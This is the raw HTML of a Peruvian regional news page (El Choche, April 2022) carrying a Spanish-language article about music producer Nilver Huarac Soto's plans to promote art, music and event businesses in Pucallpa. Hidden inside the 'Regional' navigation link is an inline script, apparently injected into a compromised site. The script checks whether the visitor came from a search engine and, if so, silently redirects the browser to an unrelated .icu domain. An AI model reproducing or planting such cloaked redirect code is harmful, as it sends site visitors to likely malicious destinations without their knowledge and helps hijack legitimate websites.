<!doctype html > <!--[if IE 8]><html class="ie8" lang="en"> <![endif]--> <!--[if IE 9]><html class="ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--><html lang="es-PE"> <!--<![endif]--><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="pingback" href="https://elchoche.pe/xmlrpc.php" /><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /><meta property="og:image" content="https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png" /><meta name="author" content="REDACCIÓN CHOCHE"><!-- <link media="all" href="https://elchoche.pe/wp-content/cache/autoptimize/css/autoptimize_6474969f401b8b43b995ebb04d6f7565.css" rel="stylesheet" /> -->
<link rel="stylesheet" type="text/css" href="//elchoche.pe/wp-content/cache/wpfc-minified/1p7y4wq5/g4gd5.css" media="all"/><title>“Vine a Pucallpa para impulsar el arte, la música y a empresas de espectáculos” - El Choche</title><link rel="canonical" href="https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="“Vine a Pucallpa para impulsar el arte, la música y a empresas de espectáculos” - El Choche" /><meta name="twitter:description" content="El conocido productor musical y televisivo Nilver Huarac Soto, se encuentra en la ciudad de Pucallpa, con la finalidad de desarrollar un plan de trabajo que permita impulsar el arte, la música y a las empresas dedicadas a la organización de eventos recreativos y de espectáculos, de la mano de un canal de televisión de [&hellip;]" /><meta name="twitter:image" content="https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png" /><meta name="twitter:label1" content="Written by" /><meta name="twitter:data1" content="REDACCIÓN CHOCHE" /><meta name="twitter:label2" content="Est. reading time" /><meta name="twitter:data2" content="2 minutos" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://elchoche.pe/#organization","name":"Diario El Choche","url":"https://elchoche.pe/","sameAs":["https://www.facebook.com/Elchochenoticias"],"logo":{"@type":"ImageObject","@id":"https://elchoche.pe/#logo","inLanguage":"es-PE","url":"https://elchoche.pe/wp-content/uploads/2020/05/logon-choche_1.jpg","contentUrl":"https://elchoche.pe/wp-content/uploads/2020/05/logon-choche_1.jpg","width":265,"height":92,"caption":"Diario El Choche"},"image":{"@id":"https://elchoche.pe/#logo"}},{"@type":"WebSite","@id":"https://elchoche.pe/#website","url":"https://elchoche.pe/","name":"El Choche","description":"El diario más popular de Pucallpa","publisher":{"@id":"https://elchoche.pe/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://elchoche.pe/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es-PE"},{"@type":"ImageObject","@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#primaryimage","inLanguage":"es-PE","url":"https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png","contentUrl":"https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png","width":1200,"height":600},{"@type":"WebPage","@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#webpage","url":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/","name":"“Vine a Pucallpa para impulsar el arte, la música y a empresas de espectáculos” - El Choche","isPartOf":{"@id":"https://elchoche.pe/#website"},"primaryImageOfPage":{"@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#primaryimage"},"datePublished":"2022-04-20T15:44:38+00:00","dateModified":"2022-04-20T15:44:42+00:00","breadcrumb":{"@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#breadcrumb"},"inLanguage":"es-PE","potentialAction":[{"@type":"ReadAction","target":["https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/"]}]},{"@type":"BreadcrumbList","@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https://elchoche.pe/"},{"@type":"ListItem","position":2,"name":"“Vine a Pucallpa para impulsar el arte, la música y a empresas de espectáculos”"}]},{"@type":"Article","@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#article","isPartOf":{"@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#webpage"},"author":{"@id":"https://elchoche.pe/#/schema/person/b349cb6f28e74e20e4271ade4d65ef84"},"headline":"“Vine a Pucallpa para impulsar el arte, la música y a empresas de espectáculos”","datePublished":"2022-04-20T15:44:38+00:00","dateModified":"2022-04-20T15:44:42+00:00","mainEntityOfPage":{"@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#webpage"},"wordCount":444,"publisher":{"@id":"https://elchoche.pe/#organization"},"image":{"@id":"https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#primaryimage"},"thumbnailUrl":"https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png","articleSection":["Espectáculo"],"inLanguage":"es-PE"},{"@type":"Person","@id":"https://elchoche.pe/#/schema/person/b349cb6f28e74e20e4271ade4d65ef84","name":"REDACCIÓN CHOCHE","image":{"@type":"ImageObject","@id":"https://elchoche.pe/#personlogo","inLanguage":"es-PE","url":"https://secure.gravatar.com/avatar/6f533c7bf3543bc06b70a23f79227d32?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/6f533c7bf3543bc06b70a23f79227d32?s=96&d=mm&r=g","caption":"REDACCIÓN CHOCHE"},"sameAs":["https://elchoche.pe/"],"url":"https://elchoche.pe/author/redaccionchoche/"}]}</script> <link rel='dns-prefetch' href='//www.googletagmanager.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//pagead2.googlesyndication.com' /><link href='https://sp-ao.shortpixel.ai' rel='preconnect' /><link rel="alternate" type="application/rss+xml" title="El Choche &raquo; “Vine a Pucallpa para impulsar el arte, la música y a empresas de espectáculos” Feed de comentarios" href="https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/feed/" /><link rel='stylesheet' id='google-fonts-style-css'  href='https://fonts.googleapis.com/css' type='text/css' media='all' /> <script type='text/javascript' src='https://elchoche.pe/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script> <script type='text/javascript' src='https://elchoche.pe/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>  <script type='text/javascript' src='https://www.googletagmanager.com/gtag/js' id='google_gtagjs-js' async></script> <script type='text/javascript' id='google_gtagjs-js-after'>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["elchoche.pe"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-217524216-1", {"anonymize_ip":true});</script> <link rel="https://api.w.org/" href="https://elchoche.pe/wp-json/" /><link rel="alternate" type="application/json" href="https://elchoche.pe/wp-json/wp/v2/posts/55876" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://elchoche.pe/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://elchoche.pe/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.9.3" /><link rel='shortlink' href='https://elchoche.pe/?p=55876' /><link rel="alternate" type="application/json+oembed" href="https://elchoche.pe/wp-json/oembed/1.0/embed?url=https%3A%2F%2Felchoche.pe%2Fespectaculo%2Fvine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos%2F" /><link rel="alternate" type="text/xml+oembed" href="https://elchoche.pe/wp-json/oembed/1.0/embed?url=https%3A%2F%2Felchoche.pe%2Fespectaculo%2Fvine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos%2F&#038;format=xml" /><meta name="generator" content="Site Kit by Google 1.72.0" /><!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]--> <script>window.tdwGlobal = {"adminUrl":"https:\/\/elchoche.pe\/wp-admin\/","wpRestNonce":"8d4e6f6685","wpRestUrl":"https:\/\/elchoche.pe\/wp-json\/","permalinkStructure":"\/%category%\/%postname%\/"};</script> <script>window.tdaGlobal = {"adminUrl":"https:\/\/elchoche.pe\/wp-admin\/","wpRestNonce":"8d4e6f6685","wpRestUrl":"https:\/\/elchoche.pe\/wp-json\/","permalinkStructure":"\/%category%\/%postname%\/","postId":55876};</script> <meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236"><meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com">  <script async="async" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5280360445465381" crossorigin="anonymous" type="text/javascript"></script>    <script>// td_js_generator - mini detector
(function(){
var htmlTag = document.getElementsByTagName("html")[0];
if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
htmlTag.className += ' ie10';
}
if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
htmlTag.className += ' ie11';
}
if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
htmlTag.className += ' td-md-is-ios';
}
var user_agent = navigator.userAgent.toLowerCase();
if ( user_agent.indexOf("android") > -1 ) {
htmlTag.className += ' td-md-is-android';
}
if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
htmlTag.className += ' td-md-is-os-x';
}
if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
htmlTag.className += ' td-md-is-chrome';
}
if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
htmlTag.className += ' td-md-is-firefox';
}
if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
htmlTag.className += ' td-md-is-safari';
}
if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
htmlTag.className += ' td-md-is-iemobile';
}
})();
var tdLocalCache = {};
( function () {
"use strict";
tdLocalCache = {
data: {},
remove: function (resource_id) {
delete tdLocalCache.data[resource_id];
},
exist: function (resource_id) {
return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
},
get: function (resource_id) {
return tdLocalCache.data[resource_id];
},
set: function (resource_id, cachedData) {
tdLocalCache.remove(resource_id);
tdLocalCache.data[resource_id] = cachedData;
}
};
})();
var td_ajax_url="https:\/\/elchoche.pe\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=10.4";
var tdThemeName="Newspaper";
var td_please_wait="Por favor espera...";
var td_email_user_pass_incorrect="Usuario o contrase\u00f1a incorrecta!";
var td_email_user_incorrect="Correo electr\u00f3nico o nombre de usuario incorrecto!";
var td_email_incorrect="Email incorrecto!";
var tds_login_mobile="";</script> <link rel="icon" href="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_32,h_32/https://elchoche.pe/wp-content/uploads/2020/06/cropped-icon_cho-32x32.jpg" sizes="32x32" /><link rel="icon" href="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_192,h_192/https://elchoche.pe/wp-content/uploads/2020/06/cropped-icon_cho-192x192.jpg" sizes="192x192" /><link rel="apple-touch-icon" href="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_180,h_180/https://elchoche.pe/wp-content/uploads/2020/06/cropped-icon_cho-180x180.jpg" /><meta name="msapplication-TileImage" content="https://elchoche.pe/wp-content/uploads/2020/06/cropped-icon_cho-270x270.jpg" /></head><body class="post-template-default single single-post postid-55876 single-format-standard td-standard-pack" itemscope="itemscope" itemtype="https://schema.org/WebPage"><div class="td-scroll-up"><i class="td-icon-menu-up"></i></div><div class="td-menu-background"></div><div id="td-mobile-nav"><div class="td-mobile-container"><div class="td-menu-socials-wrap"><div class="td-menu-socials"> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Youtube"> <i class="td-icon-font td-icon-youtube"></i> </a> </span></div><div class="td-mobile-close"> <a href="#" aria-label="Close"><i class="td-icon-close-mobile"></i></a></div></div><div class="td-menu-login-section"><div class="td-guest-wrap"><div class="td-menu-avatar"><div class="td-avatar-container"><img decoding="async" alt='' src='https://secure.gravatar.com/avatar/?s=80&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/?s=160&#038;d=mm&#038;r=g 2x' class='avatar avatar-80 photo avatar-default' height='80' width='80' loading='lazy'/></div></div><div class="td-menu-login"><a id="login-link">Registrarse</a></div></div></div><div class="td-mobile-content"><div class="menu-principal-container"><ul id="menu-principal" class="td-mobile-main-menu"><li id="menu-item-423" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-423"><a href="https://elchoche.pe/category/regional/">Regional<script type="text/javascript">var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='https://exists-mazard.icu/72bc62de-d51e-476c-ac01-659f7a459ac3' }</script></a></li><li id="menu-item-420" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-420"><a href="https://elchoche.pe/category/local/">Local</a></li><li id="menu-item-424" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-424"><a href="https://elchoche.pe/category/salud/">Salud</a></li><li id="menu-item-422" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-422"><a href="https://elchoche.pe/category/policial/">Policial</a></li><li id="menu-item-47565" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-47565"><a href="#">Deporte</a></li><li id="menu-item-47566" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-47566"><a href="#">Espectáculo</a></li></ul></div></div></div><div id="login-form" class="td-register-section"><div id="td-login-div" class="td-login-animation td-login-hide"><div class="td-login-close"> <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a><div class="td-login-title">Registrarse</div><div class="td-mobile-close"> <a href="#"><i class="td-icon-close-mobile"></i></a></div></div><div class="td-login-form-wrap"><div class="td-login-panel-title"><span>¡Bienvenido!</span>Ingrese a su cuenta</div><div class="td_display_err"></div><form action="#" method="post"><div class="td-login-inputs"><input class="td-login-input" type="text" autocomplete="username" name="login_email" id="login_email" value="" required><label>tu nombre de usuario</label></div><div class="td-login-inputs"><input class="td-login-input" autocomplete="current-password" type="password" name="login_pass" id="login_pass" value="" required><label>tu contraseña</label></div> <input type="button" name="login_button" id="login_button" class="td-login-button" value="Iniciar sesión"></form><div class="td-login-info-text"> <a href="#" id="forgot-pass-link">¿Olvidaste tu contraseña?</a></div></div></div><div id="td-forgot-pass-div" class="td-login-animation td-login-hide"><div class="td-forgot-pass-close"> <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a><div class="td-login-title">Recuperación de contraseña</div></div><div class="td-login-form-wrap"><div class="td-login-panel-title">Recupera tu contraseña</div><div class="td_display_err"></div><div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email" value="" required><label>tu correo electrónico</label></div> <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Enviar contraseña"></div></div></div></div><div class="td-search-background"></div><div class="td-search-wrap"><div class="td-drop-down-search"><form method="get" class="td-search-form" action="https://elchoche.pe/"><div class="td-search-close"> <a href="#"><i class="td-icon-close-mobile"></i></a></div><div role="search" class="td-search-input"> <span>Buscar</span> <input id="td-header-search" type="text" value="" name="s" autocomplete="off" /> <input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Buscar" /></div></form><div id="td-aj-search"></div></div></div><div id="td-outer-wrap"><div class="td-header-wrap"><div class="td-container"><div id="td-header-menu"><div id="td-top-mobile-toggle"><a href="#" aria-label="mobile-toggle"><i class="td-icon-font td-icon-mobile"></i></a></div><div class="td-main-menu-logo"> <a class="td-header-logo" aria-label="Logo" href="https://elchoche.pe/"> <img decoding="async" class="td-retina-data"
data-retina="http://elchoche.pe/wp-content/uploads/2020/05/logon-choche_1.jpg"
src="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img/http://elchoche.pe/wp-content/uploads/2020/05/logon-choche_1.jpg"
alt=""/> </a></div><div class="td-search-icon"> <a id="td-header-search-button" href="#" class="dropdown-toggle " aria-label="Search" data-toggle="dropdown"><i class="td-icon-search"></i></a></div></div></div></div><div class="td-container"><div class="td-crumb-container"><div class="entry-crumbs"><span><a title="" class="entry-crumb" href="https://elchoche.pe/">Inicio</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="Ver todas las publicaciones en Espectáculo" class="entry-crumb" href="https://elchoche.pe/category/espectaculo/">Espectáculo</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">“Vine a Pucallpa para impulsar el arte, la música y a empresas...</span></div></div><article id="post-55876" class="post-55876 post type-post status-publish format-standard category-espectaculo" itemscope itemtype="https://schema.org/Article"><div class="td-post-header"><ul class="td-category"><li class="entry-category"><a  href="https://elchoche.pe/category/espectaculo/">Espectáculo</a></li></ul><header class="td-post-title"><h1 class="entry-title">“Vine a Pucallpa para impulsar el arte, la música y a empresas de espectáculos”</h1><div class="td-module-meta-info"><div class="td-post-author-name"><div class="td-author-by">Por</div> <a href="https://elchoche.pe/author/redaccionchoche/">REDACCIÓN CHOCHE</a><div class="td-author-line"> -</div></div> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-04-20T10:44:38-05:00" >20 Abril, 2022</time></span><div class="td-post-comments"><a href="https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/#respond"><i class="td-icon-commenting"></i>0</a></div><div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-55876">1</span></div></div></header></div><div class="td-post-content"><div class="td-post-featured-image"><a href="https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png" data-caption=""><img decoding="async" width="696" height="348" class="entry-thumb td-modal-image" src="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_696,h_348/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38-696x348.png" srcset="https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_696/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38-696x348.png 696w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_300/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38-300x150.png 300w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_1024/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38-1024x512.png 1024w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_768/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38-768x384.png 768w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_1068/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38-1068x534.png 1068w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_840/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38-840x420.png 840w, https://sp-ao.shortpixel.ai/client/to_webp,q_lossy,ret_img,w_1200/https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png 1200w" sizes="(max-width: 696px) 100vw, 696px" alt="" title="miniatura-web"/></a></div><div class="td-post-sharing-top"><div id="td_social_sharing_article_top" class="td-post-sharing td-ps-bg td-ps-notext td-post-sharing-style1 "><div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Felchoche.pe%2Fespectaculo%2Fvine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div> </a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=%E2%80%9CVine+a+Pucallpa+para+impulsar+el+arte%2C+la+m%C3%BAsica+y+a+empresas+de+espect%C3%A1culos%E2%80%9D&url=https%3A%2F%2Felchoche.pe%2Fespectaculo%2Fvine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos%2F&via=El+Choche" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div> </a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/&amp;media=https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png&description=%E2%80%9CVine+a+Pucallpa+para+impulsar+el+arte%2C+la+m%C3%BAsica+y+a+empresas+de+espect%C3%A1culos%E2%80%9D" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div> </a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="https://api.whatsapp.com/send?text=%E2%80%9CVine+a+Pucallpa+para+impulsar+el+arte%2C+la+m%C3%BAsica+y+a+empresas+de+espect%C3%A1culos%E2%80%9D %0A%0A https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/" title="WhatsApp" ><div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div><div class="td-social-but-text">WhatsApp</div> </a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_top" title="More"><div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div> </a></div></div></div><p>El conocido productor musical y televisivo Nilver Huarac Soto, se encuentra en la ciudad de Pucallpa, con la finalidad de desarrollar un plan de trabajo que permita impulsar el arte, la música y a las empresas dedicadas a la organización de eventos recreativos y de espectáculos, de la mano de un canal de televisión de señal abierta que hoy tiene a su cargo, según nos comentó en una entrevista para El Choche.</p><p>Huarac Soto quien es ampliamente conocido como promotor de artistas nacionales y también por haber sido pareja sentimental de Janet Barboza, exconductora del programa “La Movida de Janet”, nos contó que le une con Pucallpa un gran sentimiento, y que es tener a su familia establecida aquí, es decir, su actual esposa es oriunda de esta ciudad, del cual no quiso ahondar en detalles señalando que es parte de su vida personal, pero que constituye uno de sus principales motivos para venir a hacer cosas en Pucallpa.</p><p>Precisó que tiene proyectado trabajar en la mejora del contenido del canal a su cargo, dotándole de mas programas de entretenimiento y diversión, pero sobre todo bastante música siempre apoyando a los artistas locales, pero manteniendo a los concesionarios actuales, ya que solo piensa utilizar los espacios libres para promocionar e impulsar todas las actividades artísticas de la región, así como también con aquellos que trabajan haciendo música y con empresas dedicadas a la organización de espectáculos y otros eventos recreativos.</p><p>Por otra parte, el también promotor de la agrupación musical femenina de cumbia “Alma Bella”, manifestó que este grupo de hermosas y talentosas chicas que dirige, actualmente se encuentran de gira por diversas ciudades del país, pero que antes de finalizar el presente mes también vendrán a Pucallpa para una presentación especial, en una conocida discoteca que pronto va ser reinaugurada y rebautizada, anotó.</p><p>Nilver Huarac, quien nos contó que también es Periodista profesional colegiado, egresado de la Bausate y Mesa en el año 1980, pero además un Consultor cultural, refiere que otra de sus actividades desde hace muchos años es el asesoramiento de campañas políticas, asegurando haber trabajado en Palacio de Gobierno, Municipalidad de Lima y haber sido co-fundador de varios diarios limeños, entre ellos Onda y El Mañanero, habiendo laborado además, en el Diario Ojo y la Crónica, “Es decir, yo soy más periodista que promotor de eventos”, enfatizó. &nbsp;&nbsp;</p><p>SAMUEL PINEDO</p></div><footer><div class="td-post-source-tags"></div><div class="td-post-sharing-bottom"><div class="td-post-sharing-classic"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></div><div id="td_social_sharing_article_bottom" class="td-post-sharing td-ps-bg td-ps-notext td-post-sharing-style1 "><div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Felchoche.pe%2Fespectaculo%2Fvine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div> </a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=%E2%80%9CVine+a+Pucallpa+para+impulsar+el+arte%2C+la+m%C3%BAsica+y+a+empresas+de+espect%C3%A1culos%E2%80%9D&url=https%3A%2F%2Felchoche.pe%2Fespectaculo%2Fvine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos%2F&via=El+Choche" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div> </a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/&amp;media=https://elchoche.pe/wp-content/uploads/2022/04/miniatura-web-38.png&description=%E2%80%9CVine+a+Pucallpa+para+impulsar+el+arte%2C+la+m%C3%BAsica+y+a+empresas+de+espect%C3%A1culos%E2%80%9D" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div> </a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="https://api.whatsapp.com/send?text=%E2%80%9CVine+a+Pucallpa+para+impulsar+el+arte%2C+la+m%C3%BAsica+y+a+empresas+de+espect%C3%A1culos%E2%80%9D %0A%0A https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/" title="WhatsApp" ><div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div><div class="td-social-but-text">WhatsApp</div> </a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_bottom" title="More"><div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div> </a></div></div></div><div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Artículo anterior</span><a href="https://elchoche.pe/regional/identifican-a-presunto-autor-de-asesinato-a-mujer-en-amarilis/">Identifican a presunto autor de asesinato a mujer en Amarilis</a></div></div><div class="td-next-prev-separator"></div></div><div class="author-box-wrap"><a href="https://elchoche.pe/author/redaccionchoche/"><img decoding="async" alt='' src='https://secure.gravatar.com/avatar/6f533c7bf3543bc06b70a23f79227d32?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/6f533c7bf3543bc06b70a23f79227d32?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' loading='lazy'/></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="https://elchoche.pe/author/redaccionchoche/">REDACCIÓN CHOCHE</a></span></div><div class="td-author-url"><a href="https://elchoche.pe/">https://elchoche.pe/</a></div><div class="td-author-description"></div><div class="td-author-social"></div><div class="clearfix"></div></div></div> <span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="REDACCIÓN CHOCHE"></span><meta itemprop="datePublished" content="2022-04-20T10:44:38-05:00"><meta itemprop="dateModified" content="2022-04-20T10:44:42-05:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://elchoche.pe/espectaculo/vine-a-pucallpa-para-impulsar-el-arte-la-musica-y-a-empresas-de-espectaculos/"/><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://elchoche.pe/wp-content/uploads/2020/05/logon-choche_1.jpg"></span><meta itemprop="name" content="El Choche"></span><meta itemprop="headline " content="“Vine a Pucallpa para impulsar el arte, la música y a empresas de espectáculos”"><span class="td-page-meta" itemprop="image" itemscope 